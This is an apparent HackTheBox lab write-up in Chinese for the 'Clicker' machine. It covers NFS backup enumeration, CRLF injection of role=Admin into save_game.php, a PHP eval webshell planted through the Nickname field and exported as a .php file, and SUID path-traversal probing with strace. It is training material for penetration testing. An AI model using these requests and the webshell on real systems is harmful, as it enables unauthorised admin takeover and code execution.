<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="076w" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      Clicker_Medium 
      
      
      |
    
     076w&#39;s World
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">076w's World</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">Clicker_Medium</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2024-02-22 14:51:58
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/HackTheBox/" title="HackTheBox">
                    #HackTheBox
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h2 id="Clicker-Medium"><a href="#Clicker-Medium" class="headerlink" title="Clicker_Medium"></a>Clicker_Medium</h2><p>碎碎念：这个靶场一会清一下数据，烦死了！！！</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450798.png" alt="img"></p>
<h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs plain">namp：<br>--min-rate 10000    10000速率来扫描<br>-p-   全端口<br>-p80,135    指定80，135端口扫描<br>-sU   指定udp扫描<br>-sT   指定tcp协议<br>-sV   扫描服务版本<br>-sC   默认脚本扫描<br>-O    对操作系统和版本探测<br>--script=vuln   进行基础漏洞扫描<br><br><br>nmap -p-  --min-rate 10000  10.129.47.107<br>nmap -p- -sU --min-rate 10000  10.129.47.107<br>nmap -p22,80,111,2049,34327,39809,45161,53053,60989 --script=vuln 10.129.47.107<br>nmap -p22,80,111,2049,34327,39809,45161,53053,60989 -sV -sC -sT -O 10.129.47.107<br></code></pre></td></tr></table></figure>

<p>22&#x2F;TCP端口上的SSH服务版本号为OpenSSH 8.9p1</p>
<p>80&#x2F;TCP端口上HTTP服务版本是Apache httpd 2.4.52</p>
<p>2049&#x2F;TCP端口则是运行NFS（Network File System）服务</p>
<p>此外，这个主机还过滤了111&#x2F;TCP端口，也就是RPCbind端口，这可能表示该主机已经启用了防火墙且限制了对RPC服务的访问。</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450800.png" alt="img"></p>
<p>尝试访问80端口 发现跳转至 <a target="_blank" rel="noopener" href="http://clicker.htb/">http://clicker.htb/</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450801.png" alt="img"></p>
<p>修改hosts文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">vim /etc/hosts<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450802.png" alt="img"></p>
<h3 id="漏洞探测"><a href="#漏洞探测" class="headerlink" title="漏洞探测"></a>漏洞探测</h3><p>80 端口乱打一通，没发现可利用点，根据 nmap 扫描结果，先行查看 2049 端口NFS服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plain">NFS（Network File System）是一种分布式文件系统协议，允许计算机通过网络共享文件和目录。<br>NFS最初由Sun Microsystems开发，用于在UNIX和类UNIX系统之间实现文件共享。它是基于客户端-服务器模型的，其中文件存储在服务器上，并通过网络提供给客户端进行访问。客户端可以远程挂载服务器上的文件系统，使得这些文件在客户端上就像本地文件一样可用。<br>NFS使用RPC（Remote Procedure Call）机制进行通信。客户端发送请求到服务器，并且服务器返回请求的文件或目录。NFS支持读、写、创建、删除等文件操作，并提供文件锁定机制以确保并发访问的一致性。<br></code></pre></td></tr></table></figure>

<p>NFS文件共享漏洞</p>
<p>参考文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_53008479/article/details/125994898">6-19漏洞利用-nfs获取目标密码文件_nfs漏洞利用-CSDN博客</a>，<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_52433710/article/details/122058141">nfs文件共享漏洞_nfs漏洞-CSDN博客</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">showmount -e 10.129.47.107<br>mount -t nfs 10.129.47.107:/mnt/backups /root/桌面/nfs -o nolock<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450803.png" alt="img"></p>
<p>解压查看备份源码 发现突破点出现在save_game.php</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450804.png" alt="img"></p>
<p>该代码是一个 PHP 页面，用于保存用户在游戏中的个人资料并更新会话信息。</p>
<p>首先，它使用了 session_start() 函数来启动一个会话，并根据是否设置了 SESSION[‘PLAYER’] 并且其不为空，判断用户是否已经登录。如果用户已经登录，则获取 GET 请求参数并调用 save_profile() 函数，将用户的游戏信息保存到数据库中。注意在获取 GET 请求参数时，代码对参数列表进行了遍历，并在其中查找“role”参数，以防止恶意用户通过修改“role”参数来实现非法操作。但是它没有对用户输入进行任何过滤和验证，使得恶意用户可以通过在 GET 请求中传递恶意参数来攻击系统。然后，代码更新了会话信息，包括用户的点击数和等级，并通过 header() 函数将用户重定向回主页，并带上一个消息提示。</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450805.png" alt="img"></p>
<p>根据 admin.php 文件中 if 语句可知 如果 SESSION[“ROLE”] 的值不等于 “Admin”，也就是用户不是管理员，那么代码会使用 header() 函数将用户重定向回主页，并终止脚本的执行。</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450806.png" alt="img"></p>
<p>于是可以尝试在 save_game.php 提交参数时插入 role&#x3D;Admin 来赋予当前账户管理员权限。</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>注册任意账户并登录</p>
<p><a target="_blank" rel="noopener" href="http://clicker.htb/play.php">http://clicker.htb/play.php</a></p>
<p>尝试直接拼接，显示 检测到恶意活动! 尝试绕过它</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450807.png" alt="img"></p>
<p>CRLF注入：<a target="_blank" rel="noopener" href="https://www.freebuf.com/column/202762.html">每日漏洞 | CRLF注入 - FreeBuf网络安全行业门户</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs plain">使用 %0a 或 %0d 均可<br><br>GET /save_game.php?clicks=0&amp;level=1&amp;role%0d=Admin HTTP/1.1<br>Host: clicker.htb<br>User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0<br>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br>Accept-Encoding: gzip, deflate<br>Connection: close<br>Referer: http://clicker.htb/play.php<br>Cookie: PHPSESSID=sufjgvlfjcdiqk7fn7o7enn5g7<br>Upgrade-Insecure-Requests: 1<br><br><br><br>GET /save_game.php?clicks=0&amp;level=1&amp;role%0a=Admin HTTP/1.1<br>Host: clicker.htb<br>User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0<br>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br>Accept-Encoding: gzip, deflate<br>Connection: close<br>Referer: http://clicker.htb/play.php<br>Cookie: PHPSESSID=sufjgvlfjcdiqk7fn7o7enn5g7<br>Upgrade-Insecure-Requests: 1<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450808.png" alt="img"></p>
<p>注销登录并重新登录，当前已是管理员权限</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450809.png" alt="img"></p>
<p>此处有一导出功能，支持 txt，josn，html 方式</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450810.png" alt="img"></p>
<p>尝试抓包修改为 php，可行，尝试内容写马生成 php 文件</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450811.png" alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450812.png" alt="img"></p>
<p>查看 export.php </p>
<p>可以通过控制当前用户的 Nickname，Clicks， Level 来控制生成文件的内容</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450813.png" alt="img"></p>
<p>Nickname即为注册时的用户名，尝试重新注册直接写 php 代码，提示不允许输入特殊字符，pass</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450814.png" alt="img"></p>
<p>save_game.php 提交参数时可以插入数据，尝试在 save_game.php 处修改Nickname进行参数覆盖</p>
<p>写入 PHP 一句话木马</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs plain">GET /save_game.php?clicks=99999999&amp;level=1&amp;Nickname=&lt;?php+eval($_POST[&#x27;hacker&#x27;]);+?&gt;&amp;role%0a=Admin HTTP/1.1<br>Host: clicker.htb<br>User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0<br>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br>Accept-Encoding: gzip, deflate<br>Connection: close<br>Referer: http://clicker.htb/play.php<br>Cookie: PHPSESSID=sufjgvlfjcdiqk7fn7o7enn5g7<br>Upgrade-Insecure-Requests: 1<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450815.png" alt="img"></p>
<p>在 <a target="_blank" rel="noopener" href="http://clicker.htb/admin.php">http://clicker.htb/admin.php</a> 导出为 php 文件</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450816.png" alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450817.png" alt="img"></p>
<p>因为靶机一会清理一下数据文件，msf 反弹一个 shell稳定一下</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450818.png" alt="img"></p>
<h3 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h3><p>suid 提权 <a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_44159028/article/details/121032305">Linux下SUID提权方法_linux suid提权_~Echo的博客-CSDN博客</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450819.png" alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450820.png" alt="img"></p>
<p>使用二进制文件执行以下任务: </p>
<p>1:创建数据库结构，并添加admin用户 </p>
<p>2:制造假玩家(最好不要告诉任何人) </p>
<p>3:重置admin密码 </p>
<p>4:删除除admin以外的所有用户</p>
<p>尝试运行一下 .&#x2F;execute_query 1 ，它好像把 SQL 脚本运行并读取回显出来了</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450821.png" alt="img"></p>
<p>strace跟踪一下看看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs plain">strace ./execute_query 1<br><br><br>execve(&quot;./execute_query&quot;, [&quot;./execute_query&quot;, &quot;1&quot;], 0x7fff84480298 /* 13 vars */) = 0<br>access(&quot;/etc/suid-debug&quot;, F_OK)         = -1 ENOENT (No such file or directory)<br>brk(NULL)                               = 0x55a24a765000<br>File not readable or not found<br>arch_prctl(0x3001 /* ARCH_??? */, 0x7fffe69032d0) = -1 EINVAL (Invalid argument)<br>fcntl(0, F_GETFD)                       = 0<br>fcntl(1, F_GETFD)                       = 0<br>fcntl(2, F_GETFD)                       = 0<br>access(&quot;/etc/suid-debug&quot;, F_OK)         = -1 ENOENT (No such file or directory)<br>mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffb09b2c000<br>access(&quot;/etc/ld.so.preload&quot;, R_OK)      = -1 ENOENT (No such file or directory)<br>openat(AT_FDCWD, &quot;/etc/ld.so.cache&quot;, O_RDONLY|O_CLOEXEC) = 3<br>newfstatat(3, &quot;&quot;, &#123;st_mode=S_IFREG|0644, st_size=21007, ...&#125;, AT_EMPTY_PATH) = 0<br>mmap(NULL, 21007, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffb09b26000<br>close(3)                                = 0<br>openat(AT_FDCWD, &quot;/lib/x86_64-linux-gnu/libc.so.6&quot;, O_RDONLY|O_CLOEXEC) = 3<br>read(3, &quot;\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0&gt;\0\1\0\0\0P\237\2\0\0\0\0\0&quot;..., 832) = 832<br>pread64(3, &quot;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&quot;..., 784, 64) = 784<br>pread64(3, &quot;\4\0\0\0 \0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0&quot;..., 48, 848) = 48<br>pread64(3, &quot;\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\&quot;\233&#125;\305\t\5?\344\337^)\350b\231\21\360&quot;..., 68, 896) = 68<br>newfstatat(3, &quot;&quot;, &#123;st_mode=S_IFREG|0755, st_size=2216304, ...&#125;, AT_EMPTY_PATH) = 0<br>pread64(3, &quot;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&quot;..., 784, 64) = 784<br>mmap(NULL, 2260560, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffb098fe000<br>mmap(0x7ffb09926000, 1658880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7ffb09926000<br>mmap(0x7ffb09abb000, 360448, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bd000) = 0x7ffb09abb000<br>mmap(0x7ffb09b13000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x214000) = 0x7ffb09b13000<br>mmap(0x7ffb09b19000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffb09b19000<br>close(3)                                = 0<br>mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffb098fb000<br>arch_prctl(ARCH_SET_FS, 0x7ffb098fb740) = 0<br>set_tid_address(0x7ffb098fba10)         = 2703<br>set_robust_list(0x7ffb098fba20, 24)     = 0<br>rseq(0x7ffb098fc0e0, 0x20, 0, 0x53053053) = 0<br>mprotect(0x7ffb09b13000, 16384, PROT_READ) = 0<br>mprotect(0x55a249dd2000, 4096, PROT_READ) = 0<br>mprotect(0x7ffb09b66000, 8192, PROT_READ) = 0<br>prlimit64(0, RLIMIT_STACK, NULL, &#123;rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY&#125;) = 0<br>munmap(0x7ffb09b26000, 21007)           = 0<br>getrandom(&quot;\x5a\xbd\x67\xef\xdc\xeb\x94\xd9&quot;, 8, GRND_NONBLOCK) = 8<br>brk(NULL)                               = 0x55a24a765000<br>brk(0x55a24a786000)                     = 0x55a24a786000<br>setreuid(1000, 1000)                    = -1 EPERM (Operation not permitted)<br>access(&quot;/home/jack/queries/create.sql&quot;, R_OK) = -1 EACCES (Permission denied)<br>newfstatat(1, &quot;&quot;, &#123;st_mode=S_IFIFO|0600, st_size=0, ...&#125;, AT_EMPTY_PATH) = 0<br>write(1, &quot;File not readable or not found\n&quot;, 31) = 31<br>exit_group(0)                           = ?<br>+++ exited with 0 +++<br></code></pre></td></tr></table></figure>

<p>这段输出是使用strace命令跟踪执行一个名为”execute_query”的程序时的结果。strace用于追踪和记录程序执行期间的系统调用和信号。</p>
<p>根据输出，我们可以得到一些信息：</p>
<ol>
<li>程序通过execve函数加载并执行了”.&#x2F;execute_query”。</li>
<li>程序尝试访问了”&#x2F;etc&#x2F;suid-debug”文件，但返回了”ENOENT”错误，表示该文件不存在。</li>
<li>程序调用了一系列的fcntl、mmap、openat系统调用，用于加载动态链接库和其他相关资源。</li>
<li>程序尝试访问了”&#x2F;etc&#x2F;ld.so.preload”和”&#x2F;etc&#x2F;ld.so.cache”文件，但都返回了”ENOENT”错误，表示这些文件不存在。</li>
<li>程序加载了”&#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;libc.so.6”动态链接库。</li>
<li>程序对内存进行了一些操作，如mmap和mprotect，用于分配和保护内存区域。</li>
<li>程序调用了setreuid函数，并返回了”EPERM”错误，表示当前用户没有权限进行该操作。</li>
<li>程序尝试访问”&#x2F;home&#x2F;jack&#x2F;queries&#x2F;create.sql”文件，但返回了”EACCES”错误，表示没有读取该文件的权限。</li>
<li>程序在标准输出上打印了”File not readable or not found”。</li>
<li>程序通过exit_group函数正常退出，返回值为0。</li>
</ol>
<p>分别starace执行 1，2，3，4 参数，发现都是访问 SQL 脚本</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450822.png" alt="img"></p>
<p>执行一下，证明猜想 运行并读取了 SQL 脚本</p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450823.png" alt="img"></p>
<p>参数 1，2，3，4都指定了路径</p>
<p>一顿跟踪尝试，发现需要两个参数</p>
<p>第一个参数是一个大于4的数字</p>
<p>第二个参数是指定要执行的sql语句的文件位置</p>
<p>因为目前我们的位置在 &#x2F;home&#x2F;jack&#x2F;query 需要三个..&#x2F;来跳出目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs plain">strace ./execute_query 5 ../../../etc/passwd<br><br><br>execve(&quot;./execute_query&quot;, [&quot;./execute_query&quot;, &quot;5&quot;, &quot;../../../etc/passwd&quot;], 0x7ffccb61acf0 /* 13 vars */) = 0<br>access(&quot;/etc/suid-debug&quot;, F_OK)         = -1 ENOENT (No such file or directory)<br>brk(NULL)                               = 0x55a5dbdcf000<br>arch_prctl(0x3001 /* ARCH_??? */, 0x7fffa7d41040) = -1 EINVAL (Invalid argument)<br>fcntl(0, F_GETFD)                       = 0<br>fcntl(1, F_GETFD)                       = 0<br>fcntl(2, F_GETFD)                       = 0<br>access(&quot;/etc/suid-debug&quot;, F_OK)         = -1 ENOENT (No such file or directory)<br>mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff30be71000<br>access(&quot;/etc/ld.so.preload&quot;, R_OK)      = -1 ENOENT (No such file or directory)<br>openat(AT_FDCWD, &quot;/etc/ld.so.cache&quot;, O_RDONLY|O_CLOEXEC) = 3<br>newfstatat(3, &quot;&quot;, &#123;st_mode=S_IFREG|0644, st_size=21007, ...&#125;, AT_EMPTY_PATH) = 0<br>mmap(NULL, 21007, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff30be6b000<br>close(3)                                = 0<br>openat(AT_FDCWD, &quot;/lib/x86_64-linux-gnu/libc.so.6&quot;, O_RDONLY|O_CLOEXEC) = 3<br>read(3, &quot;\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0&gt;\0\1\0\0\0P\237\2\0\0\0\0\0&quot;..., 832) = 832<br>pread64(3, &quot;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&quot;..., 784, 64) = 784<br>pread64(3, &quot;\4\0\0\0 \0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0&quot;..., 48, 848) = 48<br>pread64(3, &quot;\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\&quot;\233&#125;\305\t\5?\344\337^)\350b\231\21\360&quot;..., 68, 896) = 68<br>newfstatat(3, &quot;&quot;, &#123;st_mode=S_IFREG|0755, st_size=2216304, ...&#125;, AT_EMPTY_PATH) = 0<br>pread64(3, &quot;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&quot;..., 784, 64) = 784<br>mmap(NULL, 2260560, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff30bc43000<br>mmap(0x7ff30bc6b000, 1658880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7ff30bc6b000<br>mmap(0x7ff30be00000, 360448, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bd000) = 0x7ff30be00000<br>mmap(0x7ff30be58000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x214000) = 0x7ff30be58000<br>mmap(0x7ff30be5e000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff30be5e000<br>close(3)                                = 0<br>mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff30bc40000<br>arch_prctl(ARCH_SET_FS, 0x7ff30bc40740) = 0<br>set_tid_address(0x7ff30bc40a10)         = 2872<br>set_robust_list(0x7ff30bc40a20, 24)     = 0<br>rseq(0x7ff30bc410e0, 0x20, 0, 0x53053053) = 0<br>mprotect(0x7ff30be58000, 16384, PROT_READ) = 0<br>mprotect(0x55a5db366000, 4096, PROT_READ) = 0<br>mprotect(0x7ff30beab000, 8192, PROT_READ) = 0<br>prlimit64(0, RLIMIT_STACK, NULL, &#123;rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY&#125;) = 0<br>munmap(0x7ff30be6b000, 21007)           = 0<br>getrandom(&quot;\x03\x30\x24\x82\x73\x39\x44\x6d&quot;, 8, GRND_NONBLOCK) = 8<br>brk(NULL)                               = 0x55a5dbdcf000<br>brk(0x55a5dbdf0000)                     = 0x55a5dbdf0000<br>setreuid(1000, 1000)                    = -1 EPERM (Operation not permitted)<br>access(&quot;/home/jack/queries/../../../etc/passwd&quot;, R_OK) = -1 EACCES (Permission denied)<br>newfstatat(1, &quot;&quot;, &#123;st_mode=S_IFIFO|0600, st_size=0, ...&#125;, AT_EMPTY_PATH) = 0<br>File not readable or not found<br>write(1, &quot;File not readable or not found\n&quot;, 31) = 31<br>exit_group(0)                           = ?<br>+++ exited with 0 +++<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450824.png" alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/076w/Image@pic/notes/202402221450825.png" alt="img"></p>
<p>尝试读取 jack用户私钥文件</p>
